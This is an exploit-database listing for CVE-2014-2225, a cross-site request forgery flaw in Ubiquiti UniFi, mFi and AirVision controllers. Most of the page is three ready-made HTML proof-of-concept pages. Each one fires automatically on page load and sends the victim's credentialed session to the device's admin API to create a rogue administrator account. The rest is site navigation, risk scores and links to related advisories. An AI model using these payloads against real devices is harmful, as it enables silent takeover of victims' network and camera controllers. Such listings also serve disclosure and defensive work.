Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSeth Art1337DAY-ID-22485
HistoryAug 01, 2014 - 12:00 a.m.

Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability

2014-08-0100:00:00
Seth Art
0day.today
31

0.004 Low

EPSS

Percentile

73.1%

JSON

Exploit for hardware platform in category web applications

<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:8443/api/add/admin"
 
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
 
 
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
 
<body onload="sendCSRF()">
 
</body>
 
-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
 
 
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
 
 
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
 
 
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
 
 
 
--------------------
 
AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
 
 
var post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
 
 
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
 
 
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
 
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
 
 
</body>

#  0day.today [2018-01-24]  #

Related

nvd 1
exploitpack 1
packetstorm 1
seebug 1
prion 1
cvelist 1
cve 1
exploitdb 1
nvd
nvd
CVE-2014-2225
2020-02-08 16:15:10
exploitpack
exploitpack
Ubiquiti UbiFi mFi AirVision - Cross-Site Request Forgery
2014-07-28 00:00:00
packetstorm
packetstorm
UniFi / mFi / AirVision Cross Site Request Forgery
2014-07-24 00:00:00
seebug
seebug
Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability
2014-07-29 00:00:00
prion
prion
Cross site request forgery (csrf)
2020-02-08 16:15:00
cvelist
cvelist
CVE-2014-2225
2020-02-08 15:56:28
cve
cve
CVE-2014-2225
2020-02-08 16:15:10
exploitdb
exploitdb
Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery
2014-07-28 00:00:00

0.004 Low

EPSS

Percentile

73.1%

JSON
Related for 1337DAY-ID-22485
nvd1exploitpack1packetstorm1seebug1prion1cvelist1cve1exploitdb1